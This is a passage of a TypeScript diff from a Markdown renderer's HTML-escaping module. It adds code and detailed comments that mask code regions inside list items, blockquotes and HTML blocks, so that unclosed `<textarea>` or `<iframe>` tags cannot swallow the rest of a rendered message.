* Blank code regions nested inside LIST ITEMS, the list-container analogue of
|
|
2614
|
+
* `blankQuotedCode` (round 14).
|
|
2615
|
+
*
|
|
2616
|
+
* `FENCE_RE` caps fence indent at 3 columns ABSOLUTE, but CommonMark measures a
|
|
2617
|
+
* fence's indent from the enclosing item's CONTENT COLUMN. Every list wrapper
|
|
2618
|
+
* the corpus swept had a content column of 2 or 3 (`- `, `1. `), so the cap
|
|
2619
|
+
* happened to cover them and the gap was invisible; at content column 4 or more
|
|
2620
|
+
* — `-` + three spaces, `1.` + three spaces, or the TAB spelling `-\t`, all
|
|
2621
|
+
* ordinary ways to write a list — a fenced code sample inside the item is seen
|
|
2622
|
+
* by NO pass. Its `</textarea>` then satisfied `hasLaterCloser`, and a prose
|
|
2623
|
+
* `<textarea>` above stayed LIVE and swallowed the rest of the message
|
|
2624
|
+
* (reproduced end-to-end at content columns 4 and 5 in BOTH the space and tab
|
|
2625
|
+
* spellings; `escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL). The
|
|
2626
|
+
* same hole covers a BLOCKQUOTED fence inside such an item, since
|
|
2627
|
+
* `blankQuotedCode`'s own `BLOCKQUOTE_PREFIX_RE` is likewise anchored at
|
|
2628
|
+
* columns 0..3.
|
|
2629
|
+
*
|
|
2630
|
+
* Same shape as `blankQuotedCode`: strip the container prefix off each run of
|
|
2631
|
+
* lines that share a content column, then run the nested fence + indented scan
|
|
2632
|
+
* over the stripped content. The content-column stack is the one
|
|
2633
|
+
* `blankIndentedCode` keeps, INCLUDING CommonMark's `markerEnd + 1` clamp and
|
|
2634
|
+
* tab expansion, so the two passes cannot disagree about where an item's
|
|
2635
|
+
* content begins.
|
|
2636
|
+
*
|
|
2637
|
+
* FAIL DIRECTION: monotonic. Every pass it calls only ever blanks MORE of the
|
|
2638
|
+
* haystack, and more blanking means fewer visible closers, means more openers
|
|
2639
|
+
* escaped. So an over-detected run (a list marker written inside a fence
|
|
2640
|
+
* pushing a bogus column — the SCAN-SOURCE INVERSION `blankIndentedCode`
|
|
2641
|
+
* documents) costs at most a code sample rendered as escaped text.
|
|
2642
|
+
*/
|
|
2643
|
+
function blankListItemCode(masked: string, lines: MaskLine[], depth = 0): string {
|
|
2644
|
+
const cols: number[] = []
|
|
2645
|
+
let run: MaskLine[] = []
|
|
2646
|
+
let runCol = 0
|
|
2647
|
+
// One edit per run, spliced in a SINGLE fold at the end — see `spliceWindows`.
|
|
2648
|
+
const edits: Array<[number, number, string]> = []
|
|
2649
|
+
const flush = () => {
|
|
2650
|
+
if (run.length === 0) return
|
|
2651
|
+
const [from, to] = runWindow(run)
|
|
2652
|
+
const wl = rebaseRun(run, from)
|
|
2653
|
+
let win = masked.slice(from, to)
|
|
2654
|
+
// Depth limit: blank the run WHOLE rather than recurse — see
|
|
2655
|
+
// `CONTAINER_NEST_LIMIT`. Fail-closed, never a skip.
|
|
2656
|
+
if (depth >= CONTAINER_NEST_LIMIT) {
|
|
2657
|
+
edits.push([from, to, blankRanges(win, [[0, win.length]])])
|
|
2658
|
+
run = []
|
|
2659
|
+
return
|
|
2660
|
+
}
|
|
2661
|
+
// The nested FENCE scan needs unmasked content; the nested INDENTED scan
|
|
2662
|
+
// needs the CURRENT mask — exactly `blankQuotedCode`'s split. The nested
|
|
2663
|
+
// QUOTED scan is needed too: `BLOCKQUOTE_PREFIX_RE` is anchored at columns
|
|
2664
|
+
// 0..3, so a quoted fence inside a column-4 item was missed by BOTH
|
|
2665
|
+
// containers' passes (`bq-in-col4-item`, reproduced live).
|
|
2666
|
+
const afterFences = blankFencedRegions(win, wl)
|
|
2667
|
+
win = blankIndentedCode(afterFences, remapToMask(afterFences, wl))
|
|
2668
|
+
win = blankLinkDefinitions(win, wl)
|
|
2669
|
+
if (wl.some(hasQuotePrefix)) win = blankQuotedCode(win, wl, depth + 1)
|
|
2670
|
+
// …and ITSELF, the symmetric counterpart of the `blankQuotedCode →
|
|
2671
|
+
// blankListItemCode` call above (round 19 — tenth instance of the fail-open
|
|
2672
|
+
// class). `LIST_MARKER_RE` is anchored at `^` and matches only the FIRST
|
|
2673
|
+
// marker on a line, so an INNER item's content column was never pushed and
|
|
2674
|
+
// a block opened on a nested marker line (`- - ```html`, `- - [a]: /x
|
|
2675
|
+
// "</textarea>"`) was cut to the OUTER item's column only — still short of
|
|
2676
|
+
// its own. Reproduced live for both shapes at zero quote depth
|
|
2677
|
+
// (`escapeUnknownHtmlTags` byte-identical, one live `<textarea>`, the
|
|
2678
|
+
// document below swallowed). Re-cutting the stripped run re-runs
|
|
2679
|
+
// `LIST_MARKER_RE` against content that now BEGINS at the outer item's
|
|
2680
|
+
// column, so the inner marker is the first one and its column is pushed.
|
|
2681
|
+
//
|
|
2682
|
+
// TERMINATION (self-recursion): every line put in a run is cut at
|
|
2683
|
+
// `charIndexAtColumn(content, top)` with `top >= 1`, which returns an index
|
|
2684
|
+
// `>= 1` (index 0 is only reachable for column 0), so EVERY member of the
|
|
2685
|
+
// run is strictly shorter than the line it came from. The measure
|
|
2686
|
+
// `M(run) = Σ line.content.length` from `blankQuotedCode`'s proof therefore
|
|
2687
|
+
// strictly decreases across this call exactly as it does across the
|
|
2688
|
+
// `blankQuotedCode` one — blank separators enter an already-open run as
|
|
2689
|
+
// `content: ''` (length 0 ≤ original) and never open one. `M` is a
|
|
2690
|
+
// non-negative integer, so the chain is finite; a run with no marker at all
|
|
2691
|
+
// pushes no column, leaves `top === 0`, opens no run and the recursion stops
|
|
2692
|
+
// one level down — which is exactly what `hasListMarker` short-circuits.
|
|
2693
|
+
if (wl.some(hasListMarker)) win = blankListItemCode(win, wl, depth + 1)
|
|
2694
|
+
edits.push([from, to, win])
|
|
2695
|
+
run = []
|
|
2696
|
+
}
|
|
2697
|
+
for (const line of lines) {
|
|
2698
|
+
// A blank line does not close a list item, so it stays in the run — the
|
|
2699
|
+
// nested tracker needs it to see the paragraph break. CommonMark's blank
|
|
2700
|
+
// line, not `trim()` (see `isBlankLine`).
|
|
2701
|
+
if (isBlankLine(line.content)) {
|
|
2702
|
+
if (run.length > 0) run.push({ ...line, content: '' })
|
|
2703
|
+
continue
|
|
2704
|
+
}
|
|
2705
|
+
const indent = leadingIndent(line.content)
|
|
2706
|
+
while (cols.length > 0 && indent < cols[cols.length - 1]) cols.pop()
|
|
2707
|
+
// THE MARKER LINE IS ITSELF ITEM CONTENT (round 18 — eighth instance of the
|
|
2708
|
+
// fail-open class). The marker used to be pushed AFTER the run-membership
|
|
2709
|
+
// decision, so `top` was read from the enclosing state and the marker line
|
|
2710
|
+
// NEVER entered a run — the run began on the line BELOW it. A block opened
|
|
2711
|
+
// ON the marker line (`- ```html`, `1. ```html`, `-\t```html`,
|
|
2712
|
+
// `> - ```html`) was therefore seen by no pass at all: `FENCE_RE` caps
|
|
2713
|
+
// fence indent at 3 ABSOLUTE columns so the top-level tracker misses it, and
|
|
2714
|
+
// `blankIndentedCode`'s `contentCol + 4` threshold overshoots it. Worse, the
|
|
2715
|
+
// run then STARTED after the opener, so the item's CLOSING fence read as an
|
|
2716
|
+
// `open` to the nested tracker, which blanked to EOF while leaving the code
|
|
2717
|
+
// BODY — and its `</textarea>` — live in the haystack. Reproduced at ZERO
|
|
2718
|
+
// nesting depth (`escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL,
|
|
2719
|
+
// one live editable `<textarea>` swallowing the prose above it), for both
|
|
2720
|
+
// textarea and iframe and at every marker spelling.
|
|
2721
|
+
//
|
|
2722
|
+
// Pushing the marker first makes `top` the column this line's own content
|
|
2723
|
+
// starts at, so `charIndexAtColumn(content, top)` cuts exactly at the marker
|
|
2724
|
+
// (`marker[0].length`, or `markerEnd + 1` under the clamp) and hands the
|
|
2725
|
+
// nested tracker precisely the item content.
|
|
2726
|
+
//
|
|
2727
|
+
// TERMINATION IS UNCHANGED: `top >= 4` still implies `cut >= 1` (the cut
|
|
2728
|
+
// index can only be 0 when the requested column is 0), so every line put in
|
|
2729
|
+
// a run still strictly shortens and the measure `M(run)` in
|
|
2730
|
+
// `blankQuotedCode`'s termination proof still strictly decreases.
|
|
2731
|
+
const marker = LIST_MARKER_RE.exec(line.content)
|
|
2732
|
+
if (marker) {
|
|
2733
|
+
const markerEndCol = visualColumn(line.content, marker[0].length - marker[2].length)
|
|
2734
|
+
const contentCol = visualColumn(line.content, marker[0].length)
|
|
2735
|
+
cols.push(contentCol - markerEndCol > 4 ? markerEndCol + 1 : contentCol)
|
|
2736
|
+
}
|
|
2737
|
+
const top = cols.length > 0 ? cols[cols.length - 1] : 0
|
|
2738
|
+
if (top !== runCol) {
|
|
2739
|
+
flush()
|
|
2740
|
+
runCol = top
|
|
2741
|
+
}
|
|
2742
|
+
// EVERY list item is re-scanned at its own content column (round 19 — ninth
|
|
2743
|
+
// instance of the fail-open class). The gate used to be `top >= 4`, on the
|
|
2744
|
+
// claim that "below column 4 the top-level passes already cover the line at
|
|
2745
|
+
// the right column". That is true for a CONTINUATION line — its absolute
|
|
2746
|
+
// indent of 2 or 3 falls inside `FENCE_RE`'s 0..3 cap — and FALSE for the
|
|
2747
|
+
// MARKER LINE, which the top-level passes examine only at column 0, where
|
|
2748
|
+
// the leading `- ` / `1. ` is not whitespace so `FENCE_RE` cannot match and
|
|
2749
|
+
// `blankIndentedCode`'s `contentCol + 4` overshoots. At content column 2 or
|
|
2750
|
+
// 3 — `- ` and `1. `, the two MOST COMMON spellings — the gate then denied
|
|
2751
|
+
// the marker line any run at all and no pass examined it. Reproduced live
|
|
2752
|
+
// for `- ```html` / `1. ```html` / the `<iframe>` spelling, EOF-terminated
|
|
2753
|
+
// (`escapeUnknownHtmlTags` byte-identical, one live RAWTEXT element, the
|
|
2754
|
+
// document below swallowed); the closed-fence spelling is rescued only
|
|
2755
|
+
// INCIDENTALLY by `findInlineCodeRanges` matching the two backtick runs.
|
|
2756
|
+
//
|
|
2757
|
+
// Round 18 fixed WHERE the column is pushed (the marker line now joins the
|
|
2758
|
+
// run) but kept a gate whose justification was untrue one column-range
|
|
2759
|
+
// lower. The gate was an unforced optimization: the pass is documented
|
|
2760
|
+
// monotonic, so re-scanning narrow items can only blank MORE, and
|
|
2761
|
+
// termination is unaffected (`top >= 1` still implies `cut >= 1`).
|
|
2762
|
+
if (top >= 1) {
|
|
2763
|
+
const cut = charIndexAtColumn(line.content, top)
|
|
2764
|
+
if (cut < 0) {
|
|
2765
|
+
flush()
|
|
2766
|
+
runCol = 0
|
|
2767
|
+
} else {
|
|
2768
|
+
run.push({
|
|
2769
|
+
start: line.start,
|
|
2770
|
+
contentStart: line.contentStart + cut,
|
|
2771
|
+
content: line.content.slice(cut),
|
|
2772
|
+
})
|
|
2773
|
+
}
|
|
2774
|
+
}
|
|
2775
|
+
}
|
|
2776
|
+
flush()
|
|
2777
|
+
return spliceWindows(masked, edits)
|
|
2778
|
+
}
|
|
2779
|
+
|
|
2780
|
+
/**
|
|
2781
|
+
* Build the haystack `hasLaterCloser` searches: a LENGTH-PRESERVING lowercased
|
|
2782
|
+
* copy of the document with every region that cannot contain a REAL closing
|
|
2783
|
+
* tag blanked to spaces.
|
|
2784
|
+
*
|
|
2785
|
+
* Why this exists: the escaping pass carefully carves code out, but the
|
|
2786
|
+
* closer search used to run over the RAW document. So a `</textarea>` sitting
|
|
2787
|
+
* inside a code fence, an inline-code span, or another tag's attribute string
|
|
2788
|
+
* satisfied "is closed later", the prose opener was left LIVE, and parse5's
|
|
2789
|
+
* RAWTEXT span swallowed the rest of the message anyway — the whole fix was
|
|
2790
|
+
* one code sample away from being bypassed, which is exactly what an LLM
|
|
2791
|
+
* answer about HTML looks like.
|
|
2792
|
+
*
|
|
2793
|
+
* Masking (rather than deleting) keeps every index identical to the original
|
|
2794
|
+
* string, so the caller's offset arithmetic is unchanged. THE LENGTH
|
|
2795
|
+
* INVARIANT IS LOAD-BEARING — see `foldAsciiCase`.
|
|
2796
|
+
*
|
|
2797
|
+
* CARVE DECISION (deliberate, do not "unify"): these tracker-derived regions
|
|
2798
|
+
* are NOT fed to the escaping carve, even though that would stop an authored
|
|
2799
|
+
* EOF-terminated fence body from rendering as literal `<their>`.
|
|
2800
|
+
*
|
|
2801
|
+
* The genuine asymmetry is the EOF-TERMINATED fence, and only that one. The
|
|
2802
|
+
* tracker protects an unclosed opener all the way to end of input, so a single
|
|
2803
|
+
* stray ``` line — mid-stream, or inside an open raw-HTML block where a ```
|
|
2804
|
+
* line is content rather than a fence — would carve the ENTIRE remainder of the
|
|
2805
|
+
* document out of the escaping pass. `PROTECTED_SPAN_RE` protects nothing at
|
|
2806
|
+
* all there (it only recognizes a fence CLOSED by a same-marker run), so its
|
|
2807
|
+
* failure mode is bounded: a code sample renders as escaped text. In the carve
|
|
2808
|
+
* an over-detected region is a region that is NOT escaped — a fail-OPEN, i.e.
|
|
2809
|
+
* exactly the swallow this module exists to prevent — so the materially larger
|
|
2810
|
+
* fail-open surface decides it.
|
|
2811
|
+
*
|
|
2812
|
+
* SHARED over-detection (e.g. a ``` line inside an HTML block — `<div>`,
|
|
2813
|
+
* `<pre>`, `<details>` — where CommonMark says the line is HTML content, not a
|
|
2814
|
+
* fence) was previously dismissed here as "not an argument either way". THAT
|
|
2815
|
+
* WAS WRONG: it is precisely the residual fail-open. The intersection guard
|
|
2816
|
+
* below only reconciles DISAGREEMENT, so when BOTH engines open the same bogus
|
|
2817
|
+
* fence the guard is a no-op and a live `<textarea>` inside it is pushed
|
|
2818
|
+
* verbatim, swallowing the rest of the message (reproduced for all three tags).
|
|
2819
|
+
* What actually closes it is the CARVE BALANCE GUARD in
|
|
2820
|
+
* `escapeUnknownHtmlTags`: a protected span may contain no UNBALANCED RAWTEXT
|
|
2821
|
+
* opener. Neither engine needs to learn about HTML blocks for that to hold.
|
|
2822
|
+
*
|
|
2823
|
+
* What makes keeping two engines SAFE is therefore the pair of guards in
|
|
2824
|
+
* `escapeUnknownHtmlTags`: a carve span the mask did not blank is escaped
|
|
2825
|
+
* rather than pushed through verbatim, and a span carrying an unbalanced
|
|
2826
|
+
* RAWTEXT opener is escaped even when both engines agree. Over-detection can
|
|
2827
|
+
* then only cost cosmetics. Before the first guard the regex's info-string-tolerant
|
|
2828
|
+
* closer let it desync and open a span from a line CommonMark treats as
|
|
2829
|
+
* ordinary text, sheltering a live `<textarea>` from escaping entirely
|
|
2830
|
+
* (`mismatched-fence-carve-does-not-shelter-opener`). The remaining tradeoff is
|
|
2831
|
+
* pinned by `unclosed-fence-body-renders-escaped` rather than left as prose.
|
|
2832
|
+
*/
|
|
2833
|
+
function buildCloserHaystack(text: string): string {
|
|
2834
|
+
const folded = foldAsciiCase(text)
|
|
2835
|
+
const lines = toMaskLines(folded)
|
|
2836
|
+
// 1. Inline code spans (the only non-line-state code region). Uncapped and
|
|
2837
|
+
// backtracking-free — see `findInlineCodeRanges`; an over-cap span used to
|
|
2838
|
+
// be skipped entirely and sheltered a live RAWTEXT opener.
|
|
2839
|
+
let masked = blankRanges(folded, findInlineCodeRanges(folded))
|
|
2840
|
+
// 2. Every BLOCK-level code form, derived from line state over `folded`:
|
|
2841
|
+
// fences (tracker-accurate, closed and EOF-terminated alike), indented
|
|
2842
|
+
// code, blockquoted code, and HTML comments. Each of these carried a
|
|
2843
|
+
// reproduced live-textarea swallow before it was masked.
|
|
2844
|
+
masked = blankFencedRegions(masked, lines)
|
|
2845
|
+
// The indented pass walks the CURRENT mask (not `folded`) so a list marker
|
|
2846
|
+
// written inside a fence cannot shift its content-column stack — see its
|
|
2847
|
+
// SCAN-SOURCE INVERSION note. `blankQuotedCode` still gets the unmasked
|
|
2848
|
+
// lines because its NESTED fence scan needs them, and applies the same
|
|
2849
|
+
// inversion internally.
|
|
2850
|
+
masked = blankIndentedCode(masked, remapToMask(masked, lines))
|
|
2851
|
+
// …and LINK REFERENCE DEFINITIONS, which remark consumes whole and emits
|
|
2852
|
+
// nothing for, so a `</textarea>` in a destination or title is not a closer.
|
|
2853
|
+
masked = blankLinkDefinitions(masked, lines)
|
|
2854
|
+
// …and the GFM FOOTNOTE definitions that pass deliberately refuses, but only
|
|
2855
|
+
// the UNREFERENCED ones: remark-gfm drops those whole, so their bodies are
|
|
2856
|
+
// not document text either. It reads the CURRENT mask for DEFINITIONS and a
|
|
2857
|
+
// separate, more-blanked copy for REFERENCES (`footnoteReferenceMask`), both
|
|
2858
|
+
// behind a `[^` guard.
|
|
2859
|
+
//
|
|
2860
|
+
// ITS SLOT IS CONSTRAINED ON BOTH SIDES, and neither bound is cosmetic:
|
|
2861
|
+
// · it may not run EARLIER than the code passes, whose output is the
|
|
2862
|
+
// definition source;
|
|
2863
|
+
// · it may not simply be MOVED after `blankInlineLinkPayloads` /
|
|
2864
|
+
// `blankBracketLabels` to pick up the phantom-reference fix, because
|
|
2865
|
+
// `blankBracketLabels` blanks footnote labels "reference AND definition
|
|
2866
|
+
// alike" — after it, EVERY reference is gone and every referenced
|
|
2867
|
+
// definition would be over-blanked into escaped source. Hence the
|
|
2868
|
+
// separate scratch copy instead of a reorder.
|
|
2869
|
+
masked = blankUnreferencedFootnotes(masked, lines, folded)
|
|
2870
|
+
// …and the INLINE link/image spelling of the same shelter, which remark
|
|
2871
|
+
// likewise turns into href/title attributes. Container-agnostic, so like
|
|
2872
|
+
// the definition pass it needs exactly one top-level call.
|
|
2873
|
+
masked = blankInlineLinkPayloads(masked, folded)
|
|
2874
|
+
// …and the BRACKET half of that same class — an image's alt, a reference
|
|
2875
|
+
// label, a footnote label — which remark consumes into an attribute or an
|
|
2876
|
+
// identifier. Container-agnostic, so likewise exactly one top-level call.
|
|
2877
|
+
masked = blankBracketLabels(masked, folded)
|
|
2878
|
+
masked = blankQuotedCode(masked, lines)
|
|
2879
|
+
// …and the LIST-container analogue, for items whose content column exceeds
|
|
2880
|
+
// the 3-column fence-indent cap. Monotonic, so its position among the
|
|
2881
|
+
// block passes is not load-bearing.
|
|
2882
|
+
masked = blankListItemCode(masked, lines)
|
|
2883
|
+
// Comments scan the MASKED copy, not `folded` — see `blankComments`. Must
|
|
2884
|
+
// stay LAST: it relies on every code region already being blanked.
|
|
2885
|
+
masked = blankComments(masked, masked)
|
|
2886
|
+
// 3. Attribute regions. Blanking the WHOLE tag would blank real `</tag>`
|
|
2887
|
+
// closers too (and break the closed-form fixtures), so only the
|
|
2888
|
+
// attribute run between the tag name and the `>` is cleared.
|
|
2889
|
+
masked = blankTagAttributes(masked)
|
|
2890
|
+
return masked
|
|
2891
|
+
}
|
|
2892
|
+
|
|
2893
|
+
/** Exported for the length-preservation invariant test only. */
|
|
2894
|
+
export const __buildCloserHaystackForTest = buildCloserHaystack
|
|
2895
|
+
|
|
2896
|
+
/**
|
|
2897
|
+
* True when a well-formed `</tag>` (optional trailing whitespace) occurs at
|
|
2898
|
+
* or after `from` in the MASKED lowercased source (see `buildCloserHaystack`).
|
|
2899
|
+
* Substring search rather than a per-tag `RegExp` — the tag comes from
|
|
2900
|
+
* `RAWTEXT_TAGS`, but building regexes from tag names in a hot path invites
|
|
2901
|
+
* an injection footgun on the next edit.
|
|
2902
|
+
*/
|
|
2903
|
+
function hasLaterCloser(lowerSource: string, tag: string, from: number): boolean {
|
|
2904
|
+
const needle = `</${tag}`
|
|
2905
|
+
let cursor = from
|
|
2906
|
+
for (;;) {
|
|
2907
|
+
const at = lowerSource.indexOf(needle, cursor)
|
|
2908
|
+
if (at === -1) return false
|
|
2909
|
+
// Only `</tag>` or `</tag >` closes it; `</tagfoo>` is a different tag.
|
|
2910
|
+
if (/^\s*>/.test(lowerSource.slice(at + needle.length, at + needle.length + 64)))
|
|
2911
|
+
return true
|
|
2912
|
+
cursor = at + needle.length
|
|
2913
|
+
}
|
|
2914
|
+
}
|
|
2915
|
+
|
|
2916
|
+
/**
|
|
2917
|
+
* True when the mask considers `[from, to)` entirely code — every character
|
|
2918
|
+
* blanked to a space (newlines are never blanked, so they count as blank).
|
|
2919
|
+
* Both strings are the same length by construction (see `foldAsciiCase`).
|
|
2920
|
+
*/
|
|
2921
|
+
function isMaskedBlank(lowerSource: string, from: number, to: number): boolean {
|
|
2922
|
+
for (let i = from; i < to; i++) {
|
|
2923
|
+
const c = lowerSource[i]
|
|
2924
|
+
if (c !== ' ' && c !== '\n') return false
|
|
2925
|
+
}
|
|
2926
|
+
return true
|
|
2927
|
+
}
|
|
2928
|
+
|
|
2929
|
+
/**
|
|
2930
|
+
* True when `span` contains a RAWTEXT opener with no matching closer INSIDE
|
|
2931
|
+
* the span — the self-containment test the carve applies before pushing a
|
|
2932
|
+
* protected span through verbatim. See the CARVE BALANCE GUARD in
|
|
2933
|
+
* `escapeUnknownHtmlTags`.
|
|
2934
|
+
*
|
|
2935
|
+
* A closer with no opener before it is harmless (it cannot start a RAWTEXT
|
|
2936
|
+
* span), so the counter floors at zero rather than going negative.
|
|
2937
|
+
*
|
|
2938
|
+
* SELF-CLOSING IS AN OPENER (round 11). HTML ignores the self-closing flag on
|
|
2939
|
+
* non-void, non-foreign elements, so parse5 tokenizes `<textarea/>` as a START
|
|
2940
|
+
* tag and enters RAWTEXT exactly like `<textarea>`. Keying on `selfClose === ''`
|
|
2941
|
+
* therefore made this guard — and the closer check in `escapeOutsideFences` —
|
|
2942
|
+
* blind to the self-closed spelling of EVERY shape they defend against; the
|
|
2943
|
+
* round-9 HTML-block fixtures passed only because they used the bare spelling.
|
|
2944
|
+
* See the matching note on `escapeOutsideFences` for the one cosmetic cost.
|
|
2945
|
+
*/
|
|
2946
|
+
function hasUnbalancedRawtextOpener(span: string): boolean {
|
|
2947
|
+
if (span.indexOf('<') === -1) return false
|
|
2948
|
+
const open = new Map<string, number>()
|
|
2949
|
+
TAG_LIKE_REGEX.lastIndex = 0
|
|
2950
|
+
let m: RegExpExecArray | null
|
|
2951
|
+
while ((m = TAG_LIKE_REGEX.exec(span)) !== null) {
|
|
2952
|
+
const [, slash, tag] = m
|
|
2953
|
+
const lower = tag.toLowerCase()
|
|
2954
|
+
if (!RAWTEXT_TAGS.has(lower)) continue
|
|
2955
|
+
if (slash === '') {
|
|
2956
|
+
open.set(lower, (open.get(lower) ?? 0) + 1)
|
|
2957
|
+
} else {
|
|
2958
|
+
open.set(lower, Math.max(0, (open.get(lower) ?? 0) - 1))
|
|
2959
|
+
}
|
|
2960
|
+
}
|
|
2961
|
+
for (const count of open.values()) if (count > 0) return true
|
|
2962
|
+
return false
|
|
2963
|
+
}
|
|
2964
|
+
|
|
2965
|
+
/**
|
|
2966
|
+
* ---------------------------------------------------------------------------
|
|
2967
|
+
* CommonMark HTML BLOCK ranges — the property the CARVE BALANCE GUARD gates on
|
|
2968
|
+
* ---------------------------------------------------------------------------
|
|
2969
|
+
* The guard exists because a protected span sitting inside an HTML BLOCK is not
|
|
2970
|
+
* really code: CommonMark says an HTML block runs to its own terminator, so
|
|
2971
|
+
* every line inside it is HTML CONTENT. Round 9 discovered that through the
|
|
2972
|
+
* FENCE spelling (a ``` line inside `<div>` is content, but both fence engines
|
|
2973
|
+
* call it a fence and shelter what follows). Round 11 then scoped the guard to
|
|
2974
|
+
* fences — and reopened the identical hole through INLINE CODE, whose
|
|
2975
|
+
* "an inline span can shelter nothing, remark emits it as an `inlineCode` TEXT
|
|
2976
|
+
* node" justification is precisely the invariant that fails inside an HTML
|
|
2977
|
+
* block, where remark emits raw HTML and backticks are not code at all.
|
|
2978
|
+
*
|
|
2979
|
+
* Gating on the span's FLAVOR was therefore the wrong property in both
|
|
2980
|
+
* directions. This walk supplies the right one: HTML-block membership, which
|
|
2981
|
+
* covers both spellings, while `` Use the `<title>` element `` in ordinary
|
|
2982
|
+
* prose keeps rendering verbatim (round 11's regression stays fixed).
|
|
2983
|
+
*
|
|
2984
|
+
* FAIL DIRECTION: a detected range only makes the guard ESCAPE a span, and
|
|
2985
|
+
* escaping inside a GENUINE HTML block is invisible (the surrounding content is
|
|
2986
|
+
* raw HTML, where `<` is decoded as `<`). Over-detection is therefore
|
|
2987
|
+
* cosmetic ONLY when we are wrong about the block — so the walk tracks
|
|
2988
|
+
* CommonMark closely rather than blanket-detecting.
|
|
2989
|
+
*
|
|
2990
|
+
* START CONDITIONS IMPLEMENTED: all seven (1 `<script|pre|style|textarea`,
|
|
2991
|
+
* 2 `<!--`, 3 `<?`, 4 `<!LETTER`, 5 `<![CDATA[`, 6 the known block-tag list,
|
|
2992
|
+
* 7 a complete open/closing tag ALONE on its line). Condition 7 is the one that
|
|
2993
|
+
* needs paragraph state — it alone cannot interrupt a paragraph — and it is NOT
|
|
2994
|
+
* omissible: `<span>` is outside both the type-1 and type-6 tag lists, so
|
|
2995
|
+
* dropping 7 would leave `` <span>\n`<textarea>`\n</span> `` sheltering a live
|
|
2996
|
+
* opener (verified end-to-end before this walk existed). Paragraph state is
|
|
2997
|
+
* approximated by "the previous line was ordinary text", which is exact for the
|
|
2998
|
+
* shapes 7 cares about; where it errs it errs toward NOT being in a paragraph,
|
|
2999
|
+
* i.e. toward detecting a block, i.e. toward escaping.
|
|
3000
|
+
*
|
|
3001
|
+
* This walk is deliberately SEPARATE from the mask's line walk. The mask is the
|
|
3002
|
+
* closer-search security boundary and currently over-blanks a ``` line inside an
|
|
3003
|
+
* HTML block (fail-CLOSED there); teaching it about HTML blocks would UNBLANK
|
|
3004
|
+
* that region and turn a code-sample `</textarea>` into a live closer — the
|
|
3005
|
+
* fail-OPEN direction. Same line-state concept, opposite fail directions, so
|
|
3006
|
+
* they stay two walks.
|
|
3007
|
+
*/
|
|
3008
|
+
interface HtmlBlockRange {
|
|
3009
|
+
start: number
|
|
3010
|
+
end: number
|
|
3011
|
+
}
|
|
3012
|
+
|
|
3013
|
+
/** CommonMark start-condition 6 tag list (verbatim from the spec). */
|
|
3014
|
+
const HTML_BLOCK_TYPE_6_TAGS = new Set([
|
|
3015
|
+
'address', 'article', 'aside', 'base', 'basefont', 'blockquote', 'body',
|
|
3016
|
+
'caption', 'center', 'col', 'colgroup', 'dd', 'details', 'dialog', 'dir',
|
|
3017
|
+
'div', 'dl', 'dt', 'fieldset', 'figcaption', 'figure', 'footer', 'form',
|
|
3018
|
+
'frame', 'frameset', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'head', 'header',
|
|
3019
|
+
'hr', 'html', 'iframe', 'legend', 'li', 'link', 'main', 'menu', 'menuitem',
|
|
3020
|
+
'nav', 'noframes', 'ol', 'optgroup', 'option', 'p', 'param', 'search',
|
|
3021
|
+
'section', 'summary', 'table', 'tbody', 'td', 'tfoot', 'th', 'thead',
|
|
3022
|
+
'title', 'tr', 'track', 'ul',
|
|
3023
|
+
])
|
|
3024
|
+
|
|
3025
|
+
const HTML_BLOCK_START_1 = /^ {0,3}<(?:script|pre|style|textarea)(?:[ \t>]|\r?$)/i
|
|
3026
|
+
const HTML_BLOCK_END_1 = /<\/(?:script|pre|style|textarea)>/i
|
|
3027
|
+
const HTML_BLOCK_START_2 = /^ {0,3}<!--/
|
|
3028
|
+
const HTML_BLOCK_START_3 = /^ {0,3}<\?/
|
|
3029
|
+
const HTML_BLOCK_START_4 = /^ {0,3}<![a-zA-Z]/
|
|
3030
|
+
const HTML_BLOCK_START_5 = /^ {0,3}<!\[CDATA\[/
|
|
3031
|
+
const HTML_BLOCK_START_6 = /^ {0,3}<(\/?)([a-zA-Z][a-zA-Z0-9-]{0,63})(?:[ \t]|\/?>|\r?$)/
|
|
3032
|
+
/** A COMPLETE open or closing tag, alone on its line. Attribute run bounded for
|
|
3033
|
+
* the same ReDoS reason as `TAG_LIKE_REGEX`. */
|
|
3034
|
+
const HTML_BLOCK_START_7 =
|
|
3035
|
+
/^ {0,3}(?:<[a-zA-Z][a-zA-Z0-9-]{0,63}(?:\s[^>]{0,4096}?)?\/?>|<\/[a-zA-Z][a-zA-Z0-9-]{0,63}[ \t]{0,64}>)[ \t]*\r?$/
|
|
3036
|
+
/** Lines that are NOT ordinary paragraph text (so condition 7 may start after
|
|
3037
|
+
* them). A lone tag line is deliberately ABSENT: under CommonMark it cannot
|
|
3038
|
+
* interrupt a paragraph, so it continues one. */
|
|
3039
|
+
const NON_PARAGRAPH_LINE_RE =
|
|
3040
|
+
/^ {0,3}(?:#{1,6}(?:[ \t]|\r?$)|>|[-*+](?:[ \t]|\r?$)|\d{1,9}[.)](?:[ \t]|\r?$)|`{3,}|~{3,}|=+[ \t]*\r?$|(?:[-*_][ \t]*){3,}\r?$)/
|
|
3041
|
+
|
|
3042
|
+
/**
|
|
3043
|
+
* CONTAINER NORMALIZATION (round 13). Every start/end condition above is
|
|
3044
|
+
* anchored `^ {0,3}<…` and used to be matched against the RAW line, so inside a
|
|
3045
|
+
* BLOCKQUOTE or a LIST ITEM none of them ever fired — `> <div>` / `- <div>`
|
|
3046
|
+
* looked like ordinary text. CommonMark opens the block INSIDE the container, so
|
|
3047
|
+
* every following line is HTML content; the walk missed the whole range, the
|
|
3048
|
+
* balance guard stayed blind, and `` > `<textarea>` `` was pushed through
|
|
3049
|
+
* VERBATIM (`escapeUnknownHtmlTags` returned the input byte-identical).
|
|
3050
|
+
*
|
|
3051
|
+
* Detection here only ever causes ESCAPING, so a CONSERVATIVE strip is enough
|
|
3052
|
+
* and no container-stack model is needed: stripping more than CommonMark would
|
|
3053
|
+
* can only over-detect, and over-detection inside a genuine HTML block is
|
|
3054
|
+
* invisible (see FAIL DIRECTION above), while under-detection is the swallow.
|
|
3055
|
+
*
|
|
3056
|
+
* WHAT THIS MODELS: any run of blockquote markers (`>` with up to 3 spaces of
|
|
3057
|
+
* indent and one optional space after), then at most one list marker
|
|
3058
|
+
* (`-`/`*`/`+`/`1.`/`1)` plus its following spaces), then — for CONTINUATION
|
|
3059
|
+
